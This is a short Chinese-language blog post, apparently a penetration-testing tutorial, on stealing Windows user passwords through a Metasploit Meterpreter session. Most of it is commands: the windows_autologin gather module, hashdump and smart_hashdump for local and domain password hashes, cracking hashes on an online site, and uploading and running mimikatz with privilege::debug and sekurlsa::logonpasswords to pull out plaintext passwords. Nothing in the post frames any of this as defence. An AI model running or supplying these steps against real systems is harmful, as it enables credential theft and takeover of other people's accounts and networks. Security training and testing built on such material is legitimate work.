ObsiBlog即将为您展现精彩内容
354 字
2 分钟
使用MSF抓取用户密码

抓取自动登录的密码#

很多用户习惯将计算机设置自动登录

可以使用

Terminal window
run windows/gather/credentials/windows_autologin

抓取自动登录的用户名和密码

导出密码哈希#

run hashdump 命令#

hashdump 模块可以从 SAM数据库 中导出本地用户账号,该命令的使用需要系统权限

  • meterpreter_shell 中执行 run hashdump 命令
Terminal window
run hashdump
  • 用户哈希数据的输出格式为
Terminal window
用户名:SID:LM哈希:NTLM哈希:::
  • 使用在线网站解密hash密码 CMD5

  • run windows/gather/smart_hashdump 命令

使用需要系统权限。该功能更强大 如果当前用户是域管理员用户 则可以导出域内所有用户的 hash

使用 mimikatx 抓取密码#

上传 mimikatz 程序#

我们可以通过上传 mimikatz 程序 然后执行 mimikatz 程序来获取明文密码

  • 前提 执行 mimikatz 必须 System 权限 并且在执行时,要根据当前的系统位数进行选择

  • 使用方法

  1. meterpreter_shell 的命令行里面查看当前会话的权限
Terminal window
getuid
  1. 查看系统位数
Terminal window
sysinfo
  1. 选择相应位数的 mimikatz 上传至目标服务器
Terminal window
upload file #upload命令后面需要跟上要上传文件的路径;这个命令是从当前机器上传到目标机器;
  1. 进入 mimikatz 的交互界面
Terminal window
execute -i -f mimikatz.exe
  1. mimikatz 交互界面,使用以下两条命令抓取密码
Terminal window
privilege::debug
sekurlsa::logonpasswords
使用MSF抓取用户密码
https://blog.hiyun.top/posts/使用msf抓取用户密码/
作者
𝑶𝒃𝒔𝒊𝒅𝒊𝒂𝒏
发布于
2024-10-23
许可协议
CC BY-NC-SA 4.0

这篇文章是否对你有帮助?